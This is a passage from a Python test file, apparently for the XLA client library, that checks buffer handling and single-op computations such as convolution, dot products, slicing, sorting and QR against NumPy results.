np.array([2, 3, 4, 5], dtype=np.int32),
)
local_buffer = xla_client.Buffer.from_pyval(t)
# Run the test twice to verify that the original tuple buffer remains valid
# even after destructuring.
for _ in range(2):
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
array0, array1 = pieces
got = array0.to_py()
want = NumpyArrayF32([1.0, 2.0, 3.0, 4.0])
np.testing.assert_equal(want, got)
got = array1.to_py()
want = NumpyArrayS32([2, 3, 4, 5])
np.testing.assert_equal(want, got)
def testDestructureTupleNested(self):
t = ((NumpyArrayF32([1.0, 2.0]), NumpyArrayS32([3, 4])), NumpyArrayS32([5]))
local_buffer = xla_client.Buffer.from_pyval(t)
pieces = local_buffer.destructure()
self.assertFalse(local_buffer.is_deleted())
self.assertLen(pieces, 2)
tuple0, array1 = pieces
got = array1.to_py()
want = NumpyArrayS32([5])
np.testing.assert_equal(want, got)
got = tuple0.to_py()
self.assertEqual(type(got), tuple)
self.assertLen(got, 2)
np.testing.assert_equal(NumpyArrayF32([1.0, 2.0]), got[0])
np.testing.assert_equal(NumpyArrayS32([3, 4]), got[1])
def testMakeTuple(self):
t = (
np.array([1.0, 2.0, 3.0, 4.0], dtype=np.float32),
np.array([2, 3, 4, 5], dtype=np.int32),
)
b0 = xla_client.Buffer.from_pyval(t[0])
b1 = xla_client.Buffer.from_pyval(t[1])
btup = xla_client.Buffer.make_tuple([b0, b1], device=0)
pieces = btup.destructure()
self.assertLen(pieces, 2)
array0, array1 = pieces
np.testing.assert_equal(
np.array([1, 2, 3, 4], dtype=np.float32), array0.to_py())
np.testing.assert_equal(
np.array([2, 3, 4, 5], dtype=np.int32), array1.to_py())
def testShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = xla_client.Buffer.from_pyval(pyval)
xla_shape = local_buffer.shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testBlockHostUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = xla_client.Buffer.from_pyval(arg)
arg_buffer.block_host_until_ready()
# This test merely checks that nothing goes awry when we call
# block_host_until_ready(); it's difficult to test anything else.
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = xla_client.Buffer.from_pyval(arg0)
arg1_buffer = xla_client.Buffer.from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
single XLA ops. As minimal as possible number of additional ops are added
around the op being tested.
"""
def testConcatenateF32(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF32([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConcatenateF64(self):
c = self._NewComputation()
args = (
c.Constant(NumpyArrayF64([1.0, 2.0, 3.0])),
c.Constant(NumpyArrayF64([4.0, 5.0, 6.0])),
)
c.Concatenate(args, dimension=0)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0, 3.0, 4.0, 5.0, 6.0])
def testConvertElementType(self):
xla_types = {
np.bool: xla_client.PrimitiveType.PRED,
np.int32: xla_client.PrimitiveType.S32,
np.int64: xla_client.PrimitiveType.S64,
np.float32: xla_client.PrimitiveType.F32,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.ConvertElementType(x, xla_types[dst_dtype])
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, dtype=dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype)
def testBitcastConvertType(self):
xla_x32_types = {
np.int32: xla_client.PrimitiveType.S32,
np.float32: xla_client.PrimitiveType.F32,
}
xla_x64_types = {
np.int64: xla_client.PrimitiveType.S64,
np.float64: xla_client.PrimitiveType.F64,
}
def _ConvertAndTest(template, src_dtype, dst_dtype, dst_etype):
c = self._NewComputation()
x = c.Constant(np.array(template, dtype=src_dtype))
c.BitcastConvertType(x, dst_etype)
result = xla_client.execute_with_python_values(c.Build().Compile())
expected = np.array(template, src_dtype).view(dst_dtype)
self.assertEqual(result.shape, expected.shape)
self.assertEqual(result.dtype, expected.dtype)
np.testing.assert_equal(result, expected)
x = [0, 1, 0, 0, 1]
for xla_types in [xla_x32_types, xla_x64_types]:
for src_dtype, dst_dtype in itertools.product(xla_types, xla_types):
_ConvertAndTest(x, src_dtype, dst_dtype, xla_types[dst_dtype])
# TODO(b/123523486) implement AllToAll on CPU
def DISABLED_testAllToAllOneReplica(self):
samples = [
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples[:1]:
c = self._NewComputation()
c.AllToAll(c.Constant(lhs), 0, 0)
self._ExecuteAndCompareExact(c, expected=lhs)
def testCrossReplicaSumOneReplica(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs))
self._ExecuteAndCompareExact(c, expected=lhs)
def testReplicaId(self):
c = self._NewComputation()
_ = c.ReplicaId()
self._ExecuteAndCompareExact(c, expected=0)
def testCrossReplicaSumOneReplicaWithSingletonGroup(self):
samples = [
NumpyArrayF32(42.0),
NumpyArrayF32([97.0]),
NumpyArrayF32([64.0, 117.0]),
NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]]),
]
for lhs in samples:
c = self._NewComputation()
c.CrossReplicaSum(c.Constant(lhs), [[0]])
self._ExecuteAndCompareExact(c, expected=lhs)
def testDotMatrixVectorF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixVectorF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0], [20.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF32(self):
c = self._NewComputation()
lhs = NumpyArrayF32([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF32([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotMatrixMatrixF64(self):
c = self._NewComputation()
lhs = NumpyArrayF64([[2.0, 3.0], [4.0, 5.0]])
rhs = NumpyArrayF64([[10.0, 20.0], [100.0, 200.0]])
c.Dot(c.Constant(lhs), c.Constant(rhs))
self._ExecuteAndCompareClose(c, expected=np.dot(lhs, rhs))
def testDotGeneral(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithDotDimensionNumbersProto(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = xla_client.DotDimensionNumbers()
dimension_numbers.lhs_contracting_dimensions.append(2)
dimension_numbers.rhs_contracting_dimensions.append(1)
dimension_numbers.lhs_batch_dimensions.append(0)
dimension_numbers.rhs_batch_dimensions.append(0)
c.DotGeneral(c.Constant(lhs), c.Constant(rhs), dimension_numbers)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testDotGeneralWithPrecisionConfig(self):
c = self._NewComputation()
rng = np.random.RandomState(0)
lhs = NumpyArrayF32(rng.randn(10, 3, 4))
rhs = NumpyArrayF32(rng.randn(10, 4, 5))
dimension_numbers = (([2], [1]), ([0], [0]))
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGH)
config.operand_precision.append(config.Precision.HIGHEST)
c.DotGeneral(
c.Constant(lhs),
c.Constant(rhs),
dimension_numbers,
precision_config=config)
self._ExecuteAndCompareClose(c, expected=np.matmul(lhs, rhs), rtol=1e-6)
def testConvF32Same(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [1, 1], xla_client.PaddingType.SAME)
result = np.array([[[
[640., 700., 760., 300.],
[880., 940., 1000., 380.],
[1120., 1180., 1240., 460.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvF32Valid(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 3, 4)
rhs = a(1, 2, 1, 2) * 10
c.Conv(
c.Constant(lhs), c.Constant(rhs), [2, 1], xla_client.PaddingType.VALID)
result = np.array([[[
[640., 700., 760.],
[1120., 1180., 1240.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvWithGeneralPaddingF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
c.ConvWithGeneralPadding(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedF32WithPrecisionConfig(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
config = xla_client.PrecisionConfig()
config.operand_precision.append(config.Precision.HIGHEST)
config.operand_precision.append(config.Precision.DEFAULT)
c.ConvGeneralDilated(
c.Constant(lhs),
c.Constant(rhs),
strides,
pads,
lhs_dilation,
rhs_dilation,
dimension_numbers,
precision_config=config)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testConvGeneralDilatedPermutedF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 1, 2, 3)
rhs = a(1, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NHWC", "OIHW", "CWNH")
c.ConvGeneralDilated(
c.Constant(np.transpose(lhs, (0, 2, 3, 1))), c.Constant(rhs), strides,
pads, lhs_dilation, rhs_dilation, dimension_numbers)
result = np.array([[[[0., 0., 0.], [10., 20., 0.], [0., 0., 0.],
[40., 50., 0.]]]])
self._ExecuteAndCompareClose(c, expected=np.transpose(result, (1, 3, 0, 2)))
def testConvGeneralDilatedGroupedConvolutionF32(self):
c = self._NewComputation()
a = lambda *dims: np.arange(np.prod(dims)).reshape(dims).astype("float32")
lhs = a(1, 2, 2, 3)
rhs = a(2, 1, 1, 2) * 10
strides = [1, 1]
pads = [(1, 0), (0, 1)]
lhs_dilation = (2, 1)
rhs_dilation = (1, 1)
dimension_numbers = ("NCHW", "OIHW", "NCHW")
feature_group_count = 2
c.ConvGeneralDilated(
c.Constant(lhs), c.Constant(rhs), strides, pads, lhs_dilation,
rhs_dilation, dimension_numbers, feature_group_count)
result = np.array([[[
[0., 0., 0.],
[10., 20., 0.],
[0., 0., 0.],
[40., 50., 0.],
], [
[0., 0., 0.],
[330., 380., 160.],
[0., 0., 0.],
[480., 530., 220.],
]]])
self._ExecuteAndCompareClose(c, expected=result)
def testBooleanNot(self):
c = self._NewComputation()
arr = NumpyArrayBool([True, False, True])
c.Not(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=~arr)
def testCountLeadingZeros(self):
c = self._NewComputation()
arr = NumpyArrayS32([0x7FFF, 0x12345678])
c.Clz(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=[17, 3])
def testExp(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Exp(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.exp(arr))
def testExpm1(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Expm1(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.expm1(arr))
def testRound(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Round(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.round(arr))
def testLog(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log(arr))
def testLog1p(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Log1p(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.log1p(arr))
def testNeg(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Neg(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=-arr)
def testFloor(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Floor(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.floor(arr))
def testCeil(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Ceil(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.ceil(arr))
def testAbs(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, -12.1, 2.4, -1.])
c.Abs(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.abs(arr))
def testTanh(self):
c = self._NewComputation()
arr = NumpyArrayF32([3.3, 12.1])
c.Tanh(c.Constant(arr))
self._ExecuteAndCompareClose(c, expected=np.tanh(arr))
def testTrans(self):
def _TransposeAndTest(array):
c = self._NewComputation()
c.Trans(c.Constant(array))
self._ExecuteAndCompareClose(c, expected=array.T)
# Test square and non-square matrices in both default (C) and F orders.
for array_fun in [NumpyArrayF32, NumpyArrayF64]:
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]]))
_TransposeAndTest(array_fun([[1, 2, 3], [4, 5, 6]], order="F"))
_TransposeAndTest(array_fun([[1, 2], [4, 5]]))
_TransposeAndTest(array_fun([[1, 2], [4, 5]], order="F"))
def testTranspose(self):
def _TransposeAndTest(array, permutation):
c = self._NewComputation()
c.Transpose(c.Constant(array), permutation)
expected = np.transpose(array, permutation)
self._ExecuteAndCompareClose(c, expected=expected)
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2, 3], [4, 5, 6]]), [1, 0])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [0, 1])
_TransposeAndTest(NumpyArrayF32([[1, 2], [4, 5]]), [1, 0])
arr = np.random.RandomState(0).randn(2, 3, 4).astype(np.float32)
for permutation in itertools.permutations(range(arr.ndim)):
_TransposeAndTest(arr, permutation)
_TransposeAndTest(np.asfortranarray(arr), permutation)
def testEq(self):
c = self._NewComputation()
c.Eq(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False])
def testNe(self):
c = self._NewComputation()
c.Ne(
c.Constant(NumpyArrayS32([1, 2, 3, 4])),
c.Constant(NumpyArrayS32([4, 2, 3, 1])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True])
c.Ne(
c.Constant(NumpyArrayF32([-2.0, 0.0,
float("nan"),
float("nan")])),
c.Constant(NumpyArrayF32([2.0, -0.0, 1.0, float("nan")])))
self._ExecuteAndAssertWith(
np.testing.assert_allclose, c, (), expected=[True, False, True, True])
def testGt(self):
c = self._NewComputation()
c.Gt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, True, True, False, False])
def testGe(self):
c = self._NewComputation()
c.Ge(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, True, True, False, False])
def testLt(self):
c = self._NewComputation()
c.Lt(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[False, False, False, True, True])
def testLe(self):
c = self._NewComputation()
c.Le(
c.Constant(NumpyArrayS32([1, 2, 3, 4, 9])),
c.Constant(NumpyArrayS32([1, 0, 2, 7, 12])))
self._ExecuteAndCompareExact(c, expected=[True, False, False, True, True])
def testMax(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 2.0, 3.0, 7.0, 12.0])
def testMaxExplicitBroadcastDim0(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(0,))
self._ExecuteAndCompareExact(c, expected=[[3, 3, 3], [4, 5, 6], [7, 8, 9]])
def testMaxExplicitBroadcastDim1(self):
c = self._NewComputation()
c.Max(
c.Constant(NumpyArrayF32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayF32([3, 4, 5])),
broadcast_dimensions=(1,))
self._ExecuteAndCompareExact(c, expected=[[3, 4, 5], [4, 5, 6], [7, 8, 9]])
def testMin(self):
c = self._NewComputation()
c.Min(
c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0, 9.0])),
c.Constant(NumpyArrayF32([1.0, 0.0, 2.0, 7.0, 12.0])))
self._ExecuteAndCompareExact(c, expected=[1.0, 0.0, 2.0, 4.0, 9.0])
def testPad(self):
c = self._NewComputation()
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), [(1, 2, 1), (0, 1, 0)])
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testPadWithPaddingConfig(self):
c = self._NewComputation()
padding_config = xla_client.PaddingConfig()
for lo, hi, interior in [(1, 2, 1), (0, 1, 0)]:
dimension = xla_client.PaddingConfigDimension()
dimension.edge_padding_low = lo
dimension.edge_padding_high = hi
dimension.interior_padding = interior
padding_config.dimensions.append(dimension)
c.Pad(
c.Constant(NumpyArrayF32([[1.0, 2.0], [3.0, 4.0]])),
c.Constant(NumpyArrayF32(0.0)), padding_config)
self._ExecuteAndCompareClose(
c,
expected=[[0.0, 0.0, 0.0], [1.0, 2.0, 0.0], [0.0, 0.0, 0.0],
[3.0, 4.0, 0.0], [0.0, 0.0, 0.0], [0.0, 0.0, 0.0]])
def testReshape(self):
c = self._NewComputation()
c.Reshape(
c.Constant(NumpyArrayS32([[1, 2], [3, 4], [5, 6]])),
dimensions=[0, 1],
new_sizes=[2, 3])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 5, 6]])
def testCollapse(self):
c = self._NewComputation()
c.Collapse(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[1, 2])
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3, 4], [5, 6, 7, 8]])
def testRev(self):
c = self._NewComputation()
c.Rev(
c.Constant(NumpyArrayS32([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])),
dimensions=[0, 2])
self._ExecuteAndCompareExact(
c, expected=[[[6, 5], [8, 7]], [[2, 1], [4, 3]]])
def testReducePrecision(self):
c = self._NewComputation()
c.ReducePrecision(
c.Constant(NumpyArrayF32([float.fromhex("0x1.32fffep-3")])),
exponent_bits=8,
mantissa_bits=7)
self._ExecuteAndCompareClose(c, expected=[float.fromhex("0x1.32p-3")])
def testClampF32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayF32(-1)),
c.Constant(NumpyArrayF32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayF32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testClampS32(self):
c = self._NewComputation()
c.Clamp(
c.Constant(NumpyArrayS32(-1)),
c.Constant(NumpyArrayS32([-2, -1, 0, 1, 2, 3])),
c.Constant(NumpyArrayS32(2)))
self._ExecuteAndCompareExact(c, expected=[-1, -1, 0, 1, 2, 2])
def testSelect(self):
c = self._NewComputation()
c.Select(
c.Constant(NumpyArrayBool([True, False, False, True, False])),
c.Constant(NumpyArrayS32([1, 2, 3, 4, 5])),
c.Constant(NumpyArrayS32([-1, -2, -3, -4, -5])))
self._ExecuteAndCompareExact(c, expected=[1, -2, -3, 4, -5])
def testSlice(self):
c = self._NewComputation()
c.Slice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])), [1, 0],
[3, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testSliceInDim(self):
c = self._NewComputation()
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=1,
limit_index=2,
stride=1,
dimno=1)
self._ExecuteAndCompareExact(c, expected=[[2], [5], [8]])
c.SliceInDim(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
start_index=0,
limit_index=3,
stride=2,
dimno=0)
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [7, 8, 9]])
def testDynamicSlice(self):
c = self._NewComputation()
c.DynamicSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([1, 0])), [2, 2])
self._ExecuteAndCompareExact(c, expected=[[4, 5], [7, 8]])
def testDynamicUpdateSlice(self):
c = self._NewComputation()
c.DynamicUpdateSlice(
c.Constant(NumpyArrayS32([[1, 2, 3], [4, 5, 6], [7, 8, 9]])),
c.Constant(NumpyArrayS32([[1, 2], [3, 4]])),
c.Constant(NumpyArrayS32([1, 1])))
self._ExecuteAndCompareExact(c, expected=[[1, 2, 3], [4, 1, 2], [7, 3, 4]])
def testTuple(self):
c = self._NewComputation()
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True])))
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_equal(result[0], 42)
np.testing.assert_allclose(result[1], [1.0, 2.0])
np.testing.assert_equal(result[2], [True, False, False, True])
def testGetTupleElement(self):
c = self._NewComputation()
c.GetTupleElement(
c.Tuple(
c.ConstantS32Scalar(42), c.Constant(NumpyArrayF32([1.0, 2.0])),
c.Constant(NumpyArrayBool([True, False, False, True]))), 1)
self._ExecuteAndCompareClose(c, expected=[1.0, 2.0])
def testBroadcast(self):
c = self._NewComputation()
c.Broadcast(c.Constant(NumpyArrayS32([10, 20, 30, 40])), sizes=(3,))
self._ExecuteAndCompareExact(
c, expected=[[10, 20, 30, 40], [10, 20, 30, 40], [10, 20, 30, 40]])
def testBroadcastInDim(self):
c = self._NewComputation()
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [0])
self._ExecuteAndCompareExact(c, expected=[[1, 1], [2, 2]])
c.BroadcastInDim(c.Constant(NumpyArrayS32([1, 2])), [2, 2], [1])
self._ExecuteAndCompareExact(c, expected=[[1, 2], [1, 2]])
def testRngNormal(self):
shape = (2, 3)
c = self._NewComputation()
c.RngNormal(
c.Constant(NumpyArrayF32(0.)),
c.Constant(NumpyArrayF32(1.)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape and uniqueness
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
def testRngUniformF32(self):
lo, hi = 2., 4.
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayF32(lo)),
c.Constant(NumpyArrayF32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, uniqueness, and range
self.assertEqual(result.shape, shape)
self.assertLen(np.unique(result), np.prod(shape))
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testRngUniformS32(self):
lo, hi = 2, 4
shape = (2, 3)
c = self._NewComputation()
c.RngUniform(
c.Constant(NumpyArrayS32(lo)),
c.Constant(NumpyArrayS32(hi)),
dims=shape)
result = xla_client.execute_with_python_values(c.Build().Compile())
# since the result is random, we just check shape, integrality, and range
self.assertEqual(result.shape, shape)
self.assertEqual(result.dtype, np.int32)
self.assertTrue(np.all(lo <= result))
self.assertTrue(np.all(result < hi))
def testCholesky(self):
l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testSort(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
c = self._NewComputation()
c.Sort(c.Constant(keys))
self._ExecuteAndCompareClose(
c, expected=np.array([[1, 2, 3, 4], [1, 2, 3, 4]], dtype=np.float32))
def testSortKeyVal(self):
keys = np.array([[2, 4, 1, 3], [3, 1, 4, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)), dimension=0)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[2, 1, 1, 2], [3, 4, 4, 3]])
np.testing.assert_equal(result[1], [[0, 5, 2, 7], [4, 1, 6, 3]])
def testSortCustomComparator(self):
b = self._NewComputation("comparator")
p0 = b.ParameterFromNumpy(NumpyArrayF32(0))
q0 = b.ParameterFromNumpy(NumpyArrayF32(0))
p1 = b.ParameterFromNumpy(NumpyArrayS32(0))
q1 = b.ParameterFromNumpy(NumpyArrayS32(0))
b.Or(b.Lt(p0, q0), b.And(b.Eq(p0, q0), b.Gt(p1, q1)))
comparator = b.Build()
keys = np.array([[2, 3, 1, 3], [3, 1, 2, 2]], dtype=np.float32)
values = np.array([[0, 1, 2, 3], [4, 5, 6, 7]], dtype=np.int32)
c = self._NewComputation()
c.Sort((c.Constant(keys), c.Constant(values)),
dimension=1,
comparator=comparator)
result = xla_client.execute_with_python_values(c.Build().Compile())
self.assertIsInstance(result, tuple)
np.testing.assert_allclose(result[0], [[1, 2, 3, 3], [1, 2, 2, 3]])
np.testing.assert_equal(result[1], [[2, 0, 3, 1], [5, 7, 6, 4]])
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
